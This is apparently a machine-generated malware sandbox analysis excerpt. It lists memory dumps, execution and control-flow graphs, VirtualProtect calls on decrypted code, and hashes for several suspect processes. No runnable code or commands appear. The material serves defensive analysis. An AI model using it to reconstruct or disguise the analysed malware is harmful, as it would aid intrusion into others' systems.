                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Xtime_diff_to_millis2_xtime_get
                                                        • String ID:
                                                        • API String ID: 531285432-0
                                                        • Opcode ID: 34ef9d77fe822551f3acbd00f26ccaa7dfbae87d750a926cd83b01a6e80f324a
                                                        • Instruction ID: 94e4bc6bf39bc5217b7fae82e1e28317c32e829df4ab3f6dd33c9c394e473c95
                                                        • Opcode Fuzzy Hash: 34ef9d77fe822551f3acbd00f26ccaa7dfbae87d750a926cd83b01a6e80f324a
                                                        • Instruction Fuzzy Hash: 5621F875E00219AFDF00EFA5DC869FEBBB9AF48710F104065F905A7251DB649D01AFA0

                                                        Execution Graph

                                                        Execution Coverage:17.2%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:8
                                                        Total number of Limit Nodes:1
                                                        execution_graph 4829 7ffd9bac2cb1 4830 7ffd9bac2cdf 4829->4830 4833 7ffd9bac11c8 4830->4833 4832 7ffd9bac2cf8 4834 7ffd9bac118f 4833->4834 4834->4833 4835 7ffd9bac179b VirtualProtect 4834->4835 4837 7ffd9bac1679 4834->4837 4836 7ffd9bac17e1 4835->4836 4836->4832 4837->4832

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 7ffd9bac11c8-7ffd9bac11cf 1 7ffd9bac11d1-7ffd9bac11d9 0->1 2 7ffd9bac11db-7ffd9bac1214 1->2 3 7ffd9bac118f-7ffd9bac11c4 1->3 9 7ffd9bac1219-7ffd9bac1223 2->9 3->0 10 7ffd9bac1229-7ffd9bac122d 9->10 12 7ffd9bac1246 10->12 13 7ffd9bac122f-7ffd9bac1233 10->13 17 7ffd9bac1248-7ffd9bac12e3 12->17 15 7ffd9bac1239-7ffd9bac1244 13->15 16 7ffd9bac1714-7ffd9bac1729 13->16 15->17 21 7ffd9bac172b-7ffd9bac1732 16->21 22 7ffd9bac1733-7ffd9bac1793 16->22 35 7ffd9bac12ee-7ffd9bac1311 call 7ffd9bac0dd8 17->35 21->22 28 7ffd9bac179b-7ffd9bac17df VirtualProtect 22->28 29 7ffd9bac17e7-7ffd9bac180f 28->29 30 7ffd9bac17e1 28->30 30->29 37 7ffd9bac1316-7ffd9bac134c call 7ffd9bac0dd8 35->37 42 7ffd9bac134e-7ffd9bac1367 37->42 43 7ffd9bac1373-7ffd9bac137d 37->43 44 7ffd9bac1369-7ffd9bac136b 42->44 45 7ffd9bac13be-7ffd9bac13c1 42->45 46 7ffd9bac145c-7ffd9bac14a2 43->46 49 7ffd9bac136d-7ffd9bac1371 44->49 50 7ffd9bac1382-7ffd9bac1383 44->50 47 7ffd9bac13cc-7ffd9bac13db 45->47 48 7ffd9bac13c3-7ffd9bac13c5 45->48 67 7ffd9bac14a8-7ffd9bac150b 46->67 68 7ffd9bac1547-7ffd9bac15a6 46->68 54 7ffd9bac144e-7ffd9bac1456 47->54 52 7ffd9bac13c7-7ffd9bac13ca 48->52 53 7ffd9bac13dd 48->53 55 7ffd9bac1386-7ffd9bac1394 49->55 50->55 58 7ffd9bac13e0-7ffd9bac13f8 52->58 53->58 54->46 59 7ffd9bac1512-7ffd9bac1524 54->59 56 7ffd9bac1396-7ffd9bac1399 55->56 57 7ffd9bac139b-7ffd9bac139c 55->57 61 7ffd9bac139f-7ffd9bac13b9 56->61 57->61 62 7ffd9bac1538-7ffd9bac1542 58->62 63 7ffd9bac13fe-7ffd9bac1448 58->63 59->42 61->54 62->54 63->54 65 7ffd9bac1529-7ffd9bac1533 63->65 65->63 67->67 69 7ffd9bac150d 67->69 68->68 70 7ffd9bac15a8-7ffd9bac164d 68->70 69->70 71 7ffd9bac1659-7ffd9bac1677 call 7ffd9bac0dd8 70->71 72 7ffd9bac164f 70->72 75 7ffd9bac1695-7ffd9bac1699 71->75 76 7ffd9bac1679-7ffd9bac1694 call 7ffd9bac0de8 71->76 72->71 77 7ffd9bac16e6-7ffd9bac1701 75->77 80 7ffd9bac169b-7ffd9bac16a3 77->80 81 7ffd9bac1703-7ffd9bac1713 77->81 80->16 82 7ffd9bac16a5-7ffd9bac16e4 80->82 82->77
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2897863232.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9bac0000_cAvEmnl.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: @
                                                        • API String ID: 544645111-2766056989
                                                        • Opcode ID: cca081a9cba5b96089e5890e1b9c90b97ae82e86e2f37095f58f25bbd44f7ba8
                                                        • Instruction ID: d1513c23eac8a6af1b9a810ccdd6f55ff7976ad9b747343a09a0b65dfb977a5b
                                                        • Opcode Fuzzy Hash: cca081a9cba5b96089e5890e1b9c90b97ae82e86e2f37095f58f25bbd44f7ba8
                                                        • Instruction Fuzzy Hash: F732F130A18B4A8FD35CDF18C491975BBE0FF95310F55427EE09A87692DB74B852CB81

                                                        Execution Graph

                                                        Execution Coverage:18.9%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:21
                                                        Total number of Limit Nodes:3
                                                        execution_graph 1105 7ffd9bac1bae 1107 7ffd9bac1bf8 1105->1107 1106 7ffd9bac1cb3 1107->1106 1118 7ffd9bac10a0 1107->1118 1109 7ffd9bac1fd0 1110 7ffd9bac1fbf 1109->1110 1110->1109 1113 7ffd9bac1118 1110->1113 1112 7ffd9bac2111 1116 7ffd9bac111d 1113->1116 1114 7ffd9bac179b VirtualProtect 1115 7ffd9bac17e1 1114->1115 1115->1112 1116->1114 1117 7ffd9bac1679 1116->1117 1117->1112 1119 7ffd9bac10a5 1118->1119 1120 7ffd9bac179b VirtualProtect 1119->1120 1122 7ffd9bac1679 1119->1122 1121 7ffd9bac17e1 1120->1121 1121->1110 1122->1110 1123 7ffd9bac10f2 1126 7ffd9bac10fd 1123->1126 1124 7ffd9bac179b VirtualProtect 1125 7ffd9bac17e1 1124->1125 1126->1124 1127 7ffd9bac1679 1126->1127

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_00007FFD9BAC1118 34 Function_00007FFD9BAC0DE8 0->34 43 Function_00007FFD9BAC0DD8 0->43 1 Function_00007FFD9BAC0F18 2 Function_00007FFD9BAC0398 3 Function_004456C1 4 Function_00007FFD9BAC0E9A 5 Function_00007FFD9BAC0F10 6 Function_004456CE 7 Function_00007FFD9BAC250D 8 Function_00007FFD9BAC1814 9 Function_00007FFD9BAC0293 10 Function_00007FFD9BAC0392 11 Function_00007FFD9BAC0208 12 Function_00443C57 13 Function_00007FFD9BAC2785 14 Function_00007FFD9BAC2585 14->1 14->5 15 Function_00007FFD9BAC0F8B 16 Function_00007FFD9BAC000A 17 Function_00007FFD9BAC0E8A 18 Function_004446D3 19 Function_00007FFD9BAC0F00 20 Function_00007FFD9BAC0D80 68 Function_00007FFD9BAC0BB8 20->68 21 Function_00007FFD9BAC26FE 22 Function_00444558 23 Function_00443C64 24 Function_00007FFD9BAC0CF7 25 Function_00007FFD9BAC0AFA 26 Function_00007FFD9BAC0E7A 27 Function_00007FFD9BAC18F9 85 Function_00007FFD9BAC0F20 27->85 28 Function_00007FFD9BAC00F9 29 Function_00007FFD9BAC01F9 30 Function_00007FFD9BAC08F0 31 Function_004456EE 32 Function_00007FFD9BAC10F2 32->34 32->43 33 Function_00443BF4 34->1 34->5 35 Function_00007FFD9BAC0368 36 Function_004456F6 37 Function_00007FFD9BAC0E6A 38 Function_00007FFD9BAC1B6A 39 Function_00007FFD9BAC05E0 40 Function_00007FFD9BAC0EE0 41 Function_00007FFD9BAC0F60 42 Function_00443BF8 43->1 43->5 44 Function_00007FFD9BAC0E55 45 Function_00007FFD9BAC0159 46 Function_00007FFD9BAC00D9 47 Function_00007FFD9BAC0E50 47->1 47->5 48 Function_0044390F 49 Function_00007FFD9BAC04D3 50 Function_00007FFD9BAC06D3 51 Function_00007FFD9BAC07D3 52 Function_00007FFD9BAC10D3 53 Function_00007FFD9BAC24D2 54 Function_00007FFD9BAC2548 55 Function_00007FFD9BAC2745 56 Function_00007FFD9BAC0249 57 Function_00007FFD9BAC00C9 58 Function_00007FFD9BAC0EC9 59 Function_00007FFD9BAC08C0 59->39 60 Function_00443B1F 61 Function_00007FFD9BAC023D 62 Function_00443B99 63 Function_00007FFD9BAC1A41 63->11 79 Function_00007FFD9BAC0F28 63->79 64 Function_00007FFD9BAC0DC1 64->1 64->5 65 Function_004457A4 66 Function_00007FFD9BAC0438 67 Function_00007FFD9BAC1038 69 Function_004456A3 70 Function_00007FFD9BAC00B9 71 Function_00007FFD9BAC0DB0 72 Function_00007FFD9BAC1BAE 72->0 72->2 72->19 72->35 72->41 72->47 84 Function_00007FFD9BAC10A0 72->84 73 Function_00007FFD9BAC012D 74 Function_00007FFD9BAC00AD 75 Function_00007FFD9BAC0FAD 76 Function_00443428 77 Function_00007FFD9BAC09B4 78 Function_00007FFD9BAC0D31 80 Function_00007FFD9BAC02A8 81 Function_00444BB0 82 Function_00007FFD9BAC0EAA 83 Function_00007FFD9BAC01A9 84->34 84->43 86 Function_00007FFD9BAC0D20 87 Function_00007FFD9BAC041D 88 Function_00007FFD9BAC0F1D

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 7ffd9bac10a0-7ffd9bac122d 15 7ffd9bac1246 0->15 16 7ffd9bac122f-7ffd9bac1233 0->16 17 7ffd9bac1248-7ffd9bac134c call 7ffd9bac0dd8 * 2 15->17 18 7ffd9bac1239-7ffd9bac1244 16->18 19 7ffd9bac1714-7ffd9bac1729 16->19 44 7ffd9bac134e-7ffd9bac1367 17->44 45 7ffd9bac1373-7ffd9bac137d 17->45 18->17 22 7ffd9bac172b-7ffd9bac1732 19->22 23 7ffd9bac1733-7ffd9bac17df VirtualProtect 19->23 22->23 32 7ffd9bac17e7-7ffd9bac180f 23->32 33 7ffd9bac17e1 23->33 33->32 47 7ffd9bac1369-7ffd9bac136b 44->47 48 7ffd9bac13be-7ffd9bac13c1 44->48 46 7ffd9bac145c-7ffd9bac14a2 45->46 69 7ffd9bac14a8-7ffd9bac150b 46->69 70 7ffd9bac1547-7ffd9bac15a6 46->70 51 7ffd9bac136d-7ffd9bac1371 47->51 52 7ffd9bac1382-7ffd9bac1383 47->52 49 7ffd9bac13cc-7ffd9bac13db 48->49 50 7ffd9bac13c3-7ffd9bac13c5 48->50 57 7ffd9bac144e-7ffd9bac1456 49->57 55 7ffd9bac13c7-7ffd9bac13ca 50->55 56 7ffd9bac13dd 50->56 54 7ffd9bac1386-7ffd9bac1394 51->54 52->54 59 7ffd9bac1396-7ffd9bac1399 54->59 60 7ffd9bac139b-7ffd9bac139c 54->60 58 7ffd9bac13e0-7ffd9bac13f8 55->58 56->58 57->46 61 7ffd9bac1512-7ffd9bac1524 57->61 64 7ffd9bac1538-7ffd9bac1542 58->64 65 7ffd9bac13fe-7ffd9bac1448 58->65 63 7ffd9bac139f-7ffd9bac13b9 59->63 60->63 61->44 63->57 64->57 65->57 67 7ffd9bac1529-7ffd9bac1533 65->67 67->65 69->69 71 7ffd9bac150d 69->71 70->70 72 7ffd9bac15a8-7ffd9bac164d 70->72 71->72 73 7ffd9bac1659-7ffd9bac1677 call 7ffd9bac0dd8 72->73 74 7ffd9bac164f 72->74 77 7ffd9bac1695-7ffd9bac1699 73->77 78 7ffd9bac1679-7ffd9bac1694 call 7ffd9bac0de8 73->78 74->73 79 7ffd9bac16e6-7ffd9bac1701 77->79 81 7ffd9bac169b-7ffd9bac16a3 79->81 82 7ffd9bac1703-7ffd9bac1713 79->82 81->19 84 7ffd9bac16a5-7ffd9bac16e4 81->84 84->79
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2492067473.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7ffd9bac0000_github.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: @
                                                        • API String ID: 544645111-2766056989
                                                        • Opcode ID: b70002c7b51a4a7a465724b9fc30df20c9b21fb76431adc10c9d8692657e6816
                                                        • Instruction ID: 76f6ed56c63e30552e3c780cb3c7ce1ebbf1b6f5beab092128940cfb514f4bdf
                                                        • Opcode Fuzzy Hash: b70002c7b51a4a7a465724b9fc30df20c9b21fb76431adc10c9d8692657e6816
                                                        • Instruction Fuzzy Hash: FF32F230A18B498FD35CDF58D4A19B5BBE0FF99314F05427EE09A87692DB74B842CB81
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2624084678.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_5080000_EJQ2xs8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $qq$$qq$$qq
                                                        • API String ID: 0-3876402241
                                                        • Opcode ID: 850841ecc852f2fb281ce2b1537b1ac6a93a216d402255ac84d153d9905bbde0
                                                        • Instruction ID: f93d4cecf1d1222d9acedad7c69181f35aa7203764687031bcc8b7eaeb38ef1d
                                                        • Opcode Fuzzy Hash: 850841ecc852f2fb281ce2b1537b1ac6a93a216d402255ac84d153d9905bbde0
                                                        • Instruction Fuzzy Hash: FA0262707103199FEB08AB75E868B6E7BE7FF88702F144428E6069B394DE759C418BD1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2624084678.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_5080000_EJQ2xs8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $qq$$qq
                                                        • API String ID: 0-1516316326
                                                        • Opcode ID: 7d8916367afaabc1fe6300bd79fc4db7fcb13fb175e189d65601c2e5fceaed85
                                                        • Instruction ID: 0e086c2d36f3a221eb01265da81e26b51e40ddcc5da2f541b959ada053414bc5
                                                        • Opcode Fuzzy Hash: 7d8916367afaabc1fe6300bd79fc4db7fcb13fb175e189d65601c2e5fceaed85
                                                        • Instruction Fuzzy Hash: C4D172707103198FEB04AB75E868B6E7BA7FF88702F144528D50A9B394DF749C458BD1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2624084678.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_5080000_EJQ2xs8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $qq$$qq
                                                        • API String ID: 0-1516316326
                                                        • Opcode ID: 9c7a9609e28b229df079fcfae99bac5791eb9691e2f7e7f9d1b16593643fc512
                                                        • Instruction ID: 658df6878199b95aa5bd174f455f4bdb9605bed58da38d82d825e9d2147954bd
                                                        • Opcode Fuzzy Hash: 9c7a9609e28b229df079fcfae99bac5791eb9691e2f7e7f9d1b16593643fc512
                                                        • Instruction Fuzzy Hash: B5A1A1707103198FEB08AB75E864B7E76E7BF88711F248428D90A9B394DF759C428BD1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2624084678.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_5080000_EJQ2xs8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LRqq
                                                        • API String ID: 0-2392378202
                                                        • Opcode ID: 9d5307f99e3ac5d1d1e18f824e2750801c310a0686afdde28632d9091ec8f1ab
                                                        • Instruction ID: c7ed5efc0c83d96339f4545e7fe5e97c2f19e326dbfd1be455d84ff9fe55f339
                                                        • Opcode Fuzzy Hash: 9d5307f99e3ac5d1d1e18f824e2750801c310a0686afdde28632d9091ec8f1ab
                                                        • Instruction Fuzzy Hash: 40313470B042158FDB49EF388964A3EBBF7AFC9204B1884A9D449DB395EE30DD068391
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2624084678.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_5080000_EJQ2xs8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LRqq
                                                        • API String ID: 0-2392378202
                                                        • Opcode ID: fff5d05f5e91e390fa4ce1177af10551c343343ac0acfe198cff0bde118fbbd9
                                                        • Instruction ID: abd41121c717a7b2a68d30a77020a9f2e6a3fbf2db51142ac876d0c3b22d964b
                                                        • Opcode Fuzzy Hash: fff5d05f5e91e390fa4ce1177af10551c343343ac0acfe198cff0bde118fbbd9
                                                        • Instruction Fuzzy Hash: BD210370B1011A8FCF48EB789964A7E76E7AFC8304F188478D449EB3A5EE34CD068791
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2624084678.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_5080000_EJQ2xs8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9bdbfda0c562f38965764ee43d52a7c4d898d96cbf6c1598eb5005afa9cc9d81
                                                        • Instruction ID: 33375d5fb99a39d1abd573569e272ccb1de2c43806463431e8f0ee0a6e92d9ce
                                                        • Opcode Fuzzy Hash: 9bdbfda0c562f38965764ee43d52a7c4d898d96cbf6c1598eb5005afa9cc9d81
                                                        • Instruction Fuzzy Hash: C621D5B1B043155FDB48EBBD585836EBADBEFC8261B18442DC60AD7744EE388C0547A1
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2624084678.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_5080000_EJQ2xs8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5c1462851a6097f502468c563a615e05a14fc2ee7a36c2c2dff256e18c8c1dc8
                                                        • Instruction ID: 6b7286136f1fc5ccd3052a7181a62b690905ad42e279ffd82fdd45c54057240f
                                                        • Opcode Fuzzy Hash: 5c1462851a6097f502468c563a615e05a14fc2ee7a36c2c2dff256e18c8c1dc8
                                                        • Instruction Fuzzy Hash: F3318F70A10319DFDB00EBB8D8547AEBBB6FF88305F104668D615A7340EB70AA45CB81
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2624084678.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_5080000_EJQ2xs8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5d1dbbdd988a6fbceff69a5ed5205a75ceb82f5837cbfc6b27343263e0673fb6
                                                        • Instruction ID: 3af9266270e119b73a33185ee15e2a9719604b80e36360fe14f2edb20ee338f5
                                                        • Opcode Fuzzy Hash: 5d1dbbdd988a6fbceff69a5ed5205a75ceb82f5837cbfc6b27343263e0673fb6
                                                        • Instruction Fuzzy Hash: 1D216070A1031DDFDB04EBB8D8546AE7BB7FF88305F104569D505A7300EB71AA45CB91